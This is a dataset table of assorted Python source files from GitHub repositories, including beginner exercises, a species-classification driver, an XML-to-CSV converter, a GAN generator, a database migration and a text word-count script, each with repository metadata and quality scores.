max_stars_repo_path (stringlengths 3-269) | max_stars_repo_name (stringlengths 4-119) | max_stars_count (int64 0-191k) | id (stringlengths 1-7) | content (stringlengths 6-1.05M) | score (float64 0.23-5.13) | int_score (int64 0-5) |
---|---|---|---|---|---|---|
2-python-intermediario (Programacao Procedural)/aula01-funcoes/exercicio2.py | Leodf/projetos-python | 0 | 12789251 | <reponame>Leodf/projetos-python
"""
Create a function 1 that receives a function 2 as a parameter and returns the value of function 2 when executed.
"""
def ola_mundo():
return 'Olá mundo!'
def mestre(funcao):
return funcao()
executando = mestre(ola_mundo)
print(executando)
"""
Create a function 1 that receives a function 2 as a parameter and returns the value of function 2 when executed. Make function 1 execute two functions that take a different number of arguments.
"""
def funcmestre(funcao, *args, **kwargs):
return funcao(*args, **kwargs)
def falar_oi(nome):
return f'Oi {nome} '
def saudacao(nome, saudacao):
return f'{saudacao} {nome}'
executar = funcmestre(falar_oi, 'Leo')
executar2 = funcmestre(saudacao, 'Leo', saudacao='Bom dia')
print(executar)
print(executar2) | 3.578125 | 4 |
alluka/__init__.py | FasterSpeeding/Alluka | 9 | 12789252 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# cython: language_level=3
# BSD 3-Clause License
#
# Copyright (c) 2020-2022, Faster Speeding
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A type based dependency injection framework for Python 3.9+."""
from __future__ import annotations
__all__: list[str] = [
"AllukaError",
"AsyncOnlyError",
"AsyncSelfInjecting",
"BasicContext",
"Client",
"Injected",
"InjectedDescriptor",
"MissingDependencyError",
"SelfInjecting",
"abc",
"inject",
]
import typing
from . import abc
from ._client import BasicContext
from ._client import Client
from ._client import inject
from ._errors import AllukaError
from ._errors import AsyncOnlyError
from ._errors import MissingDependencyError
from ._self_injecting import AsyncSelfInjecting
from ._self_injecting import SelfInjecting
from ._types import Injected
from ._types import InjectedDescriptor
__author__: typing.Final[str] = "Faster Speeding"
__ci__: typing.Final[str] = "https://github.com/FasterSpeeding/Alluka/actions"
__copyright__: typing.Final[str] = "© 2020-2022 Faster Speeding"
__coverage__: typing.Final[str] = "https://codeclimate.com/github/FasterSpeeding/Alluka"
__docs__: typing.Final[str] = "https://alluka.cursed.solutions/"
__email__: typing.Final[str] = "<EMAIL>"
__issue_tracker__: typing.Final[str] = "https://github.com/FasterSpeeding/Alluka/issues"
__license__: typing.Final[str] = "BSD"
__url__: typing.Final[str] = "https://github.com/FasterSpeeding/Alluka"
__version__: typing.Final[str] = "0.1.1"
| 1.375 | 1 |
Python/code case/code case 26.py | amazing-2020/pdf | 3 | 12789253 | <gh_stars>1-10
import random
def number():
return int(input('Enter a number: '))
i = 0
a = random.randint(-10, 100)
while True:
i += 1
b = number()
if a > b:
print('Number too small: ')
elif a < b:
print('Number too big: ')
else:
print('After %d times you succeed get %d' % (i, a))
break
| 3.796875 | 4 |
classify_images.py | bw4sz/SpeciesClassification | 0 | 12789254 | #######
#
# classify_images.py
#
# This is a test driver for running our species classifiers and detectors.
# The script classifies one or more hard-coded image files.
#
# Because the inference code has not been assembled into a formal package yet,
# you should define API_ROOT to point to the base of our repo. This
# will be added to your Python path later in the script.
#
# This script has two non-code dependencies:
#
# * a classification model file (and, optionally, a detection model file)
# * a taxonomy file, so the scientific names used in the training data can
# be mapped to common names.
#
# We are currently testing against PyTorch 0.4.1 and Cuda 9.0, and we have tested on
# both Linux and Windows.
#
#######
#%% Constants and imports
import sys
import os
import pandas as pd
# Directory to which you sync'd the repo. Probably the same
# directory this file lives in, but for portability, this file is set up to only
# take dependencies on the repo according to this constant.
API_ROOT = r'd:\git\SpeciesClassification'
# Path to taxa.csv, for latin --> common mapping
#
# Set to None to disable latin --> common mapping
TAXONOMY_PATH = r'd:\temp\taxa.csv' # None
IMAGES_TO_CLASSIFY = [
r"D:\temp\animals\African_Elephant\30651.ngsversion.1421960098780.jpg",
r"D:\temp\animals\Alligator\Alligator_mississippiensis_01.JPG"
]
# CLASSIFICATION_MODEL_PATH = r'd:\temp\models\inc4-incres2-560-78.5\model_deploy.pth.tar'
CLASSIFICATION_MODEL_PATH = r"D:\temp\models\resnext-448-78.8\model_best.pth.tar"
# Detection (i.e., bounding box generation) is optional; set to None
# to disable detection
DETECTION_MODEL_PATH = None
SUBDIRS_TO_IMPORT = ['DetectionClassificationAPI','FasterRCNNDetection','PyTorchClassification']
# This must be True if detection is enabled. Classification can be run
# on the CPU or GPU.
USE_GPU = True
# List of image sizes to use, one per model in the ensemble. Images will be resized
# and reshaped to square images prior to classification.
#
# We typically specify [560,560] if we're loading our Inception/InceptionResnet
# ensemble. For ResNext, we typically specify [448].
#
# IMAGE_SIZES = [560, 560]
IMAGE_SIZES = [448]
#%% Path setup to import the classification code
if (not API_ROOT.lower() in map(str.lower,sys.path)):
print("Adding {} to the python path".format(API_ROOT))
sys.path.insert(0,API_ROOT)
for s in SUBDIRS_TO_IMPORT:
importPath = os.path.join(API_ROOT,s)
print("Adding {} to the python path".format(API_ROOT))
sys.path.insert(0,importPath)
#%% Import classification modules
import api as speciesapi
#%% Build Latin --> common mapping
latinToCommon = {}
if TAXONOMY_PATH != None:
print("Reading taxonomy file")
# Read taxonomy file; takes ~1 minute
df = pd.read_csv(TAXONOMY_PATH)
df = df.fillna('')
# Columns are:
#
# taxonID,scientificName,parentNameUsageID,taxonRank,vernacularName,wikipedia_url
# Create dictionary by ID
nRows = df.shape[0]
for index, row in df.iterrows():
latinName = row['scientificName']
latinName = latinName.strip()
if len(latinName)==0:
print("Warning: invalid scientific name at {}".format(index))
latinName = 'unknown'
commonName = row['vernacularName']
commonName = commonName.strip()
latinName = latinName.lower()
commonName = commonName.lower()
latinToCommon[latinName] = commonName
print("Finished reading taxonomy file")
#%% Define Latin-->common lookup
def doLatinToCommon(latinName):
if len(latinToCommon) == 0:
return latinName
latinName = latinName.lower()
if not latinName in latinToCommon:
print("Warning: latin name {} not in lookup table".format(latinName))
commonName = latinName
else:
commonName = latinToCommon[latinName]
commonName = commonName.strip()
if (len(commonName) == 0):
print("Warning: empty result for latin name {}".format(latinName))
commonName = latinName
return commonName
#%% Create the model(s)
assert os.path.isfile(CLASSIFICATION_MODEL_PATH)
if DETECTION_MODEL_PATH != None:
assert os.path.isfile(DETECTION_MODEL_PATH)
print("Loading model")
model = speciesapi.DetectionClassificationAPI(CLASSIFICATION_MODEL_PATH, DETECTION_MODEL_PATH, IMAGE_SIZES, USE_GPU)
print("Finished loading model")
#%% Classify images
nImages = len(IMAGES_TO_CLASSIFY)
for iImage,imageFileName in enumerate(IMAGES_TO_CLASSIFY):
print("Processing image {} of {}".format(iImage,nImages))
# def predict_image(self, image_path, topK=1, multiCrop=False, predict_mode=PredictMode.classifyUsingDetect):
try:
prediction = model.predict_image(imageFileName, topK=5, multiCrop=False,
predict_mode=speciesapi.PredictMode.classifyOnly)
except Exception as e:
print("Error classifying image {} ({}): {}".format(iImage,imageFileName,str(e)))
continue
fn = os.path.splitext(imageFileName)[0]
for i in range(0, len(prediction.species)):
latinName = prediction.species[i]
likelihood = prediction.species_scores[i]
commonName = doLatinToCommon(latinName)
print('"{}","{}","{}","{}","{}","{}"\n'.format(
iImage,fn,i,latinName,commonName,likelihood))
print("Finished classifying {} images".format(nImages))
| 2.140625 | 2 |
xml2csv.py | LynnChan706/object_detection_auto | 0 | 12789255 | #!/usr/bin/env python3.5
# coding=utf-8
'''
@date = '17/12/1'
@author = 'lynnchan'
@email = '<EMAIL>'
'''
import os
import glob
import pandas as pd
import xml.etree.ElementTree as ET
from gconfig import *
train_path = Train_Data_Path
test_path = Test_Data_Path
def xml_to_csv(path):
xml_list = []
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
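        # Each <object> element is assumed to follow the Pascal VOC annotation layout:
        # member[0] is the class name and member[4] is the <bndbox> element whose
        # children are xmin, ymin, xmax and ymax (see the column names below).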
for member in root.findall('object'):
if os.path.splitext(root.find('filename').text)[1] == '.jpg':
value = (root.find('filename').text,
int(root.find('size')[0].text),
int(root.find('size')[1].text),
member[0].text,
int(member[4][0].text),
int(member[4][1].text),
int(member[4][2].text),
int(member[4][3].text)
)
else:
value = (root.find('filename').text+'.jpg',
int(root.find('size')[0].text),
int(root.find('size')[1].text),
member[0].text,
int(member[4][0].text),
int(member[4][1].text),
int(member[4][2].text),
int(member[4][3].text)
)
xml_list.append(value)
column_name = ['filename', 'width', 'height', 'class', 'xmin', 'ymin', 'xmax', 'ymax']
xml_df = pd.DataFrame(xml_list, columns=column_name)
return xml_df
def creat_csv():
if type(train_path) !=list:
xml_train = xml_to_csv(train_path)
xml_train.to_csv(train_path+'/'+Train_File_Name+'.csv', index=None)
print('Successfully converted train xml to csv.')
else:
for i in train_path:
xml_train = xml_to_csv(i)
xml_train.to_csv(i + '/' + Train_File_Name + '.csv', index=None)
print('Successfully converted list train xml to csv.')
if type(test_path) != list:
xml_test = xml_to_csv(test_path)
xml_test.to_csv(test_path+'/'+Test_File_Name+'.csv', index=None)
print('Successfully converted test xml to csv.')
else:
for i in test_path:
xml_train = xml_to_csv(i)
xml_train.to_csv(i + '/' + Test_File_Name + '.csv', index=None)
            print('Successfully converted list test xml to csv.')
if __name__ == '__main__':
creat_csv()
| 3 | 3 |
notebooks/method_comp_c.py | nedlrichards/tau_decomp | 0 | 12789256 | <reponame>nedlrichards/tau_decomp
from scipy.io import loadmat
import gsw
import numpy as np
import matplotlib.pyplot as plt
from src import Config, lvl_profiles, grid_field, Section, SA_CT_from_sigma0_spiciness0
plt.ion()
cf = Config()
# sound speed comparison
all_lvls = np.load('data/processed/inputed_decomp.npz')
z_a = all_lvls['z_a']
x_a = all_lvls['x_a']
press = gsw.p_from_z(-z_a, cf.lat)
# extrapolate from stable position into mixed layer
stable_lvls = all_lvls['stable_lvls']
filled_lvls = all_lvls['filled_lvls']
spice_lvls = np.concatenate([stable_lvls[[0], :, :], filled_lvls[[1], :, :]])
sig_rud, tau_rud = grid_field(z_a, spice_lvls, cf.sig_lvl[:spice_lvls.shape[1]])
sa_rud, ct_rud = SA_CT_from_sigma0_spiciness0(sig_rud, tau_rud)
c_rud = gsw.sound_speed(sa_rud, ct_rud, press[:, None])
# tau difference method
decomp_fields = np.load('data/processed/decomposed_fields.npz')
z_a_decomp = decomp_fields['z_a']
c_tau_d = decomp_fields['c_spice']
z_i = z_a_decomp < 300
fig, ax = plt.subplots(2, 1, sharex=True, sharey=True, figsize=(cf.jasa_1clm, 4))
cm = ax[0].pcolormesh(x_a / 1e3, z_a, c_rud, cmap=plt.cm.coolwarm,
vmin=1497, vmax=1510)
cm = ax[1].pcolormesh(x_a / 1e3, z_a_decomp[z_i], c_tau_d[z_i, :],
cmap=plt.cm.coolwarm, vmin=1497, vmax=1510)
ax[0].set_xlim(0, 199)
ax[0].set_ylim(150, 0)
fig.supylabel('Depth (m)')
ax[1].set_xlabel('Position, $x$ (km)')
pos = ax[0].get_position()
pos.x0 += 0.07
pos.x1 += 0.07
pos.y0 += 0.04
pos.y1 += 0.09
ax[0].set_position(pos)
pos = ax[1].get_position()
pos.x0 += 0.07
pos.x1 += 0.07
pos.y0 += 0.02
pos.y1 += 0.07
ax[1].set_position(pos)
| 1.929688 | 2 |
tests/auth/test_auth.py | nabetama/slacky | 3 | 12789257 | from tests.test_common import TestSlack
class TestAuth(TestSlack):
def test_auth(self):
assert self.slack.auth
def test_auth_test(self):
assert self.slack.auth.test
def test_auth_test_response(self):
assert self.slack.auth.test.status_code == 200
| 2.078125 | 2 |
tests/fit_simulaid.py | hassnabdl/Helix-Analysis-Program | 1 | 12789258 | <gh_stars>1-10
import numpy as np
def fit_simulaid(phi):
"""
    DEPRECATED AND ONLY WORKING FOR A SMALL NUMBER OF SAMPLES
--
Fit theta such as:
phi_i = theta * i + phi_0 (E)
Solving the system:
| SUM(E)
| SUM(E*i for i)
that can be written:
| a11 * theta + a12 * phi_0 = b1
| a21 * theta + a22 * phi_0 = b2
---
    Parameters:
        phi
---
Return:
theta
"""
n = len(phi)-1
# coefficients
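    # These are the least-squares normal-equation coefficients for phi_i = theta*i + phi_0:
    # a11 = sum(i^2) = n(n+1)(2n+1)/6, a12 = a21 = sum(i) = n(n+1)/2, and a22 counts the
    # samples (this code uses n = len(phi) - 1).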
a11 = (2*n + 1)*(n + 1)*n/6
a21 = n*(n+1)/2
a12 = a21
a22 = n
# Second member
b1 = 0
b2 = 0
for i, phi in enumerate(phi):
b1 += phi*i
b2 += phi
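    # Solve the 2x2 system for theta (Cramer's rule / elimination of phi_0).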
theta = (a22*b1 - a12 * b2)/(a22*a11 - a12*a21)
return theta
def test_fit_simulaid():
import math
phi = [0, 1, 2, 3, 4, 5]
# should be 1
    slope = fit_simulaid(phi)
print(slope)
phi = [0, -1, -2, -3, -4, -5]
    slope = fit_simulaid(phi)
# should be -1
print(slope)
# Counter-examples
phi = [2.9045003839409125, 3.9638782375957637,
6.855200868214659]
    slope = fit_simulaid(phi)
# should be positive
print(slope)
# test_fit_simulaid()
| 3.375 | 3 |
cogs/utils/resolver.py | Lazyuki/DiscordStatsBotPython | 2 | 12789259 | <reponame>Lazyuki/DiscordStatsBotPython<filename>cogs/utils/resolver.py
import discord
import re
import shlex
ID_REGEX = re.compile(r'([0-9]{15,21})>?\b')
# Can access members with dots
class Map(dict):
__getattr__ = dict.get
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
def has_role(member, role_id):
if not member or not member.roles:
return False
return discord.utils.find(lambda r: r.id == role_id, member.roles) is not None
def has_any_role(member, role_ids):
if not member or not member.roles:
return False
return discord.utils.find(lambda r: r.id in role_ids, member.roles) is not None
def resolve_minimum_channel(ctx, channel_id):
channel = ctx.guild.get_channel(channel_id)
if channel is None:
        channel = Map({
'name': f'#deleted-channel({channel_id})',
'id': channel_id
})
return channel
def resolve_user_id(ctx, arg):
id_match = ID_REGEX.match(arg)
guild = ctx.guild
user_id = None
if id_match is None:
arg = arg.lower()
arg_len = len(arg)
username_exact = None
potential_matches = {}
partial_matches = {}
members = guild.members
for member in members:
username = member.name.lower()
usertag = f'{username}#{member.discriminator}'.lower()
nick = member.nick.lower() if member.nick else ''
member_id = member.id
# In order of priority
if usertag == arg:
return member_id
if username == arg:
username_exact = member_id
elif nick == arg:
potential_matches[0] = member_id
elif username.startswith(arg):
potential_matches[len(username) - arg_len] = member_id
elif nick.startswith(arg):
potential_matches[len(nick) - arg_len] = member_id
elif arg in username:
partial_matches[len(username) - arg_len] = member_id
elif arg in usertag:
partial_matches[len(usertag) - arg_len] = member_id
elif arg in nick:
partial_matches[len(nick) - arg_len] = member_id
if username_exact:
return username_exact
if potential_matches:
closest = min(potential_matches.keys())
return potential_matches[closest]
if partial_matches:
closest = min(partial_matches.keys())
return partial_matches[closest]
else:
user_id = int(id_match.group(1))
return user_id
def resolve_role(ctx, role):
roles = ctx.guild.roles
role = role.lower()
starts = []
contains = []
for r in roles:
name = r.name.lower()
if name == role:
return r
if name.startswith(role):
starts.append(r)
if role in name:
contains.append(r)
if starts:
return starts[0]
if contains:
return contains[0]
return None
def resolve_options(content: str, accepted_options: dict):
"""
accepted_options: {
name: {
abbrev: str;
boolean: bool;
}
}
"""
if (not content) or (not accepted_options):
return (content, {})
resolved = {}
rest_content = []
names = accepted_options.keys()
abbrevs = { opt['abbrev']: key for key, opt in accepted_options.items() }
words = shlex.split(content)
word_iter = iter(words)
try:
while True:
word = next(word_iter)
if word.startswith('--'):
name = word[2:]
if name in names:
opt = accepted_options[name]
boolean = opt['boolean']
if boolean:
resolved[name] = True
else:
resolved[name] = next(word_iter)
elif word.startswith('-'):
abs = word[1:]
for a in abs:
if a in abbrevs:
name = abbrevs[a]
opt = accepted_options[name]
boolean = opt['boolean']
if boolean:
resolved[name] = True
else:
resolved[name] = next(word_iter)
else:
rest_content.append(word)
except StopIteration:
pass
return (' '.join(rest_content), resolved)
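
# Illustrative example (not from the original module): with
# accepted_options = {"days": {"abbrev": "d", "boolean": False},
#                     "silent": {"abbrev": "s", "boolean": True}}
# resolve_options("spam ham --days 7 -s", accepted_options) would return
# ("spam ham", {"days": "7", "silent": True}).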
| 2.40625 | 2 |
common/models/generators.py | Aixile/chainer-gan-experiments | 70 | 12789260 | import numpy as np
import math
import chainer
import chainer.functions as F
import chainer.links as L
from chainer import cuda, optimizers, serializers, Variable
from chainer import function
from chainer.utils import type_check
from .ops import *
class DCGANGenerator(chainer.Chain):
def __init__(self, latent=128, out_ch=3, base_size=1024, use_bn=True, up_layers=4, upsampling='up_deconv'):
layers = {}
self.up_layers = up_layers
self.base_size = base_size
self.latent = latent
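        # Build the layer dict: a linear projection to a 4x4 feature map, then
        # `up_layers - 1` upsampling blocks that halve the channel count, and a
        # final tanh-activated upsampling block that emits `out_ch` channels.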
if use_bn:
norm = 'bn'
w = chainer.initializers.Normal(0.02)
else:
norm = None
w = None
base = base_size
layers['c_first'] = NNBlock(latent, 4*4*base, nn='linear', norm=norm, w_init=w)
for i in range(up_layers-1):
layers['c'+str(i)] = NNBlock(base, base//2, nn=upsampling, norm=norm, w_init=w)
base = base//2
layers['c'+str(up_layers-1)] = NNBlock(base, out_ch, nn=upsampling, norm=None, w_init=w, activation=F.tanh)
#print(layers)
super(DCGANGenerator, self).__init__(**layers)
def __call__(self, z, test=False):
h = self.c_first(z, test=test)
h = F.reshape(h, (h.data.shape[0], self.base_size, 4, 4))
for i in range(self.up_layers):
h = getattr(self, 'c'+str(i))(h, test=test)
return h
| 2.078125 | 2 |
python_practice/python_tricks/chp3/args_kwargs/example_3_return_nothing.py | sokunmin/deep_learning_practices | 0 | 12789261 | def foo(value):
if value:
return value
else:
return None
def foo2(value):
"""Bare return statement implies `return None`"""
if value:
return value
else:
return
def foo3(value):
"""Missing return statement implies `return None`"""
if value:
return value
print('[1-1] ', type(foo(0)))
print('[1-2] ', (foo(0)))
print('[2-1] ', type(foo2(0)))
print('[2-2] ', (foo2(0)))
print('[3-1] ', type(foo3(0)))
print('[3-2] ', (foo3(0))) | 3.9375 | 4 |
start.py | TrixiS/base-bot | 0 | 12789262 | <reponame>TrixiS/base-bot<filename>start.py
import os
import platform
from pathlib import Path
SYSTEM = platform.system()
root_path = Path(__file__).parent
os.chdir(str(root_path.absolute()))
def install_dependencies():
requirements_path = root_path / "requirements.txt"
if SYSTEM == "Windows":
install_command = "pip install wheel -r {requirements_path} --quiet"
else:
install_command = (
"python3 -m pip install -U wheel -r {requirements_path} --quiet"
)
os.system(install_command.format(requirements_path=requirements_path))
def start_bot():
if SYSTEM == "Windows":
start_command = "python -m bot"
else:
start_command = "python3 -m bot"
os.system(start_command)
def run_update():
import update
update.main()
def main():
install_dependencies()
run_update()
start_bot()
if SYSTEM == "Windows":
os.system("pause")
if __name__ == "__main__":
main()
| 2.34375 | 2 |
merge_csv.py | jfilter/wikipedia-edits-verified-accounts | 6 | 12789263 | import csv
from pathlib import Path
folder = 'recent_changes'
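
# Gather every .csv file in the folder, keep a single header row, and
# concatenate all data rows into '<folder>_all.csv'.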
all_csv = [pth for pth in Path(folder).iterdir()
if pth.suffix == '.csv']
header = None
rows = []
for f_csv in all_csv:
with open(f_csv) as csvfile:
reader = csv.reader(csvfile)
header = next(reader) # read header
rows += list(reader)
with open(f'{folder}_all.csv', 'w') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(header)
writer.writerows(rows)
| 3.109375 | 3 |
ex067.py | Jordemar-D-Bousquet/Exercicios_Python | 0 | 12789264 | <reponame>Jordemar-D-Bousquet/Exercicios_Python
# Write a program that shows the multiplication table of several numbers, one at a time, for each value entered by the user.
# The program is interrupted when the requested number is negative.
while True:
n = int(input('Digite um número para ver a sua tabuada ou um número negativo para parar: '))
if n < 0:
break
print('='*30)
for c in range(1,11):
m = n*c
print(f'{n} x {c} = {m}')
print('=' * 30)
print('Fim da Tabuada!!!') | 3.96875 | 4 |
src/compas/datastructures/network/_network.py | kathrindoerfler/compas | 0 | 12789265 | <reponame>kathrindoerfler/compas<filename>src/compas/datastructures/network/_network.py
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from compas.datastructures.network.core import BaseNetwork
from compas.datastructures.network.core import network_split_edge
__all__ = ['Network']
class Network(BaseNetwork):
__module__ = "compas.datastructures"
split_edge = network_split_edge
# =============================================================================
# Main
# =============================================================================
if __name__ == "__main__":
# from compas.geometry import intersection_line_line_xy
from compas.datastructures import Mesh
from compas.datastructures import network_find_cycles
# from compas_plotters import NetworkPlotter
from compas_plotters import MeshPlotter
# nodes = [[0, 0, 0], [1, 0, 0], [2, 0, 0], [0, 1, 0], [1, 1, 0], [2, 1, 0]]
# edges = [[0, 1], [1, 2], [3, 4], [4, 5], [0, 3], [1, 4], [2, 5], [0, 4], [1, 5], [1, 3], [2, 4]]
data = {
0: [-40.0, 55.0, 0.0],
1: [-35.0, 55.0, 0.0],
2: [-30.0, 55.0, 0.0],
4: [-35.0, 60.0, 0.0],
6: [-37.5, 57.5, 0.0],
7: [-32.5, 57.5, 0.0],
8: [-40.0, 53.82, 0.0],
10: [-30.0, 53.82, 0.0],
11: [-35.0, 61.18, 0.0]}
# key_index = {key: index for index, key in enumerate(data)}
# nodes = data.values()
edges = [(0, 8), (0, 1), (1, 2), (10, 2), (0, 6), (6, 4), (4, 11), (4, 7), (7, 2)]
# edges = [(key_index[u], key_index[v]) for u, v in edges]
# net = Network.from_nodes_and_edges(nodes, edges)
# network = net.copy()
network = Network()
for key, xyz in data.items():
network.add_node(key, x=xyz[0], y=xyz[1], z=xyz[2])
for u, v in edges:
network.add_edge(u, v)
points = {key: network.node_coordinates(key) for key in network.nodes()}
cycles = network_find_cycles(network, breakpoints=network.leaves())
mesh = Mesh.from_vertices_and_faces(points, cycles)
# e1 = network.edge_coordinates(0, 4)
# e2 = network.edge_coordinates(1, 3)
# xyz = intersection_line_line_xy(e1, e2)
# network.delete_edge(0, 4)
# network.delete_edge(1, 3)
# x = network.add_node(x=xyz[0], y=xyz[1], z=xyz[2])
# network.add_edge(x, 0)
# network.add_edge(x, 1)
# network.add_edge(x, 3)
# network.add_edge(x, 4)
# plotter = NetworkPlotter(network, figsize=(8, 5))
# plotter.draw_nodes(text='key', radius=0.25)
# plotter.draw_edges()
# plotter.show()
plotter = MeshPlotter(mesh, figsize=(8, 5))
plotter.draw_vertices(text='key', radius=0.25)
plotter.draw_edges(keys=list(set(mesh.edges()) - set(mesh.edges_on_boundary())))
plotter.draw_faces(text='key', keys=list(set(mesh.faces()) - set(mesh.faces_on_boundary())))
plotter.save('find_cycles.png')
| 2.296875 | 2 |
primeiros-exercicios/lpc072.py | miguelsndc/PythonFirstLooks | 1 | 12789266 | <gh_stars>1-10
menor = 0
for c in range(0, 3):
produto = float(input('Digite o preço dos Produtos: '))
    if c == 0 or produto < menor:
        menor = produto
print(f'Você deve optar pelo produto de {menor}, pois ele é o mais barato.') | 3.9375 | 4 |
simple.py | pythonflaskserverapps/helloworld | 0 | 12789267 | #############################################
# global imports
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote
import sys
import os
import json
#############################################
#############################################
# local imports
from serverutils import process
from serverutils.utils import postjson, ProcessManager
#############################################
FLASK_SERVER_URL = os.environ["FLASK_SERVER_URL"]
SIMPLE_ENGINE_PATH = os.path.join("engines", os.environ["SIMPLE_ENGINE_NAME"])
PROCESS_READ_CALLBACK_URL = FLASK_SERVER_URL + "/read"
#############################################
class SimpleProcessManager(ProcessManager):
def __init__(self, key):
super().__init__(key)
def read_line_callback(self, sline):
postjson(PROCESS_READ_CALLBACK_URL, {
"kind": "procreadline",
"prockey": self.key,
"sline": sline
})
class EngineProcessManager(SimpleProcessManager):
def __init__(self, key):
super().__init__(key)
def popen(self):
return process.PopenProcess(
SIMPLE_ENGINE_PATH,
self.read_line_callback
)
class BotProcessManager(SimpleProcessManager):
def __init__(self, key):
super().__init__(key)
def popen(self):
return process.PopenProcess(
"python",
self.read_line_callback,
proc_args = ["-u", "bot.py"],
ignore_cwd = True
)
processmanagers = {
"engine": EngineProcessManager("engine"),
"bot": BotProcessManager("bot")
}
#############################################
class testHTTPServer_RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
global processmanagers
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
message = "! no command"
if len(self.path) > 1:
commandstr = unquote(self.path[1:])
print("commandstr", commandstr)
try:
commandobj = None
commandobj = json.loads(commandstr)
try:
command = commandobj.get("command", None)
key = commandobj.get("key", None)
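                        # Command protocol: "r" starts the managed process, "s" stops it,
                        # and any other string is forwarded to the process as a line of input.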
if command == "r":
message = processmanagers[key].start()
elif command == "s":
message = processmanagers[key].stop()
else:
message = processmanagers[key].send_line(command)
except:
message = "! command error"
except:
message = "! command parse error"
print("status", message)
self.wfile.write(bytes(message, "utf8"))
#############################################
def start_server():
print('starting server...')
server_address = (sys.argv[1], int(sys.argv[2]))
httpd = HTTPServer(server_address, testHTTPServer_RequestHandler)
print('running server on address', server_address)
httpd.serve_forever()
#############################################
start_server()
print("server started") | 2.328125 | 2 |
migrations/versions/3b6e7f250153_update_trello_url_type.py | palazzem/gello | 44 | 12789268 | <gh_stars>10-100
# -*- coding: utf-8 -*-
#
# Unless explicitly stated otherwise all files in this repository are licensed
# under the Apache 2 License.
#
# This product includes software developed at Datadog
# (https://www.datadoghq.com/).
#
# Copyright 2018 Datadog, Inc.
#
"""Update trello_url type.
Revision ID: 3b6e7f250153
Revises: <PASSWORD>
Create Date: 2018-03-30 16:41:29.076091
"""
from alembic import op
import sqlalchemy as sa
revision = '3b6e7f250153'
down_revision = '0afe19626b22'
def upgrade():
op.alter_column(
'issues', 'trello_card_url',
existing_type=sa.String(length=64),
type_=sa.Text(),
existing_nullable=True
)
op.alter_column(
'pull_requests', 'trello_card_url',
existing_type=sa.String(length=64),
type_=sa.Text(),
existing_nullable=True
)
def downgrade():
op.alter_column(
'pull_requests', 'trello_card_url',
existing_type=sa.Text(),
type_=sa.String(length=64),
existing_nullable=True
)
op.alter_column(
'issues', 'trello_card_url',
existing_type=sa.Text(),
type_=sa.String(length=64),
existing_nullable=True
)
| 1.703125 | 2 |
word_count.py | Noahs-ARK/idea_relations | 29 | 12789269 | <reponame>Noahs-ARK/idea_relations
# -*- coding: utf-8 -*-
import collections
import re
import io
import gzip
import json
import functools
import logging
import numpy as np
import scipy.stats as ss
from nltk.corpus import stopwords
import utils
STOPWORDS = set(stopwords.words("english") + ["said"])
def get_ngram_list(input_words, ngrams=1, filter_stopwords=True,
bigram_dict=None):
words = [w.lower() for w in input_words.split()]
result = []
for start in range(len(words) - ngrams + 1):
tmp_words = words[start:start+ngrams]
if filter_stopwords and any([w in STOPWORDS for w in tmp_words]):
continue
w = " ".join(tmp_words)
result.append(w)
return result
def get_mixed_tokens(input_words, ngrams=1, filter_stopwords=True,
bigram_dict=None):
words = [w.lower() for w in input_words.split()]
result, index = [], 0
while index < len(words):
w = words[index]
if filter_stopwords and w in STOPWORDS:
index += 1
continue
# look forward
if index < len(words) - 1:
bigram = w + " " + words[index + 1]
if bigram in bigram_dict:
result.append(bigram)
index += 2
continue
result.append(w)
index += 1
return result
def get_word_count(input_file, filter_stopwords=True, ngrams=1,
bigram_dict=None, words_func=None):
result = collections.defaultdict(int)
for data in utils.read_json_list(input_file):
words = words_func(data["text"], ngrams=ngrams,
filter_stopwords=filter_stopwords,
bigram_dict=bigram_dict)
for w in words:
result[w] += 1
return result
def find_bigrams(filename, output_file, filter_stopwords=True, threshold=100,
min_count=5):
unigram_count = get_word_count(filename,
filter_stopwords=filter_stopwords, ngrams=1,
words_func=get_ngram_list)
total_words = float(sum(unigram_count.values()))
bigram_count = get_word_count(filename,
filter_stopwords=filter_stopwords, ngrams=2,
words_func=get_ngram_list)
bigram_list = []
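    # Score each bigram with a discounted PMI-style phrase statistic (similar in
    # spirit to the word2vec phrase-detection heuristic): the discounted bigram
    # count, scaled by the total word count and divided by the product of the two
    # unigram counts; bigrams scoring above `threshold` are kept.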
for w in bigram_count:
words = w.split()
score = (bigram_count[w] - min_count) * total_words \
/ (unigram_count[words[0]] * unigram_count[words[1]])
if score > threshold:
bigram_list.append((score, w))
bigram_list.sort(reverse=True)
with open(output_file, "w") as fout:
for score, w in bigram_list:
fout.write("%s\n" % json.dumps({"word": w, "score": score}))
def load_bigrams(filename):
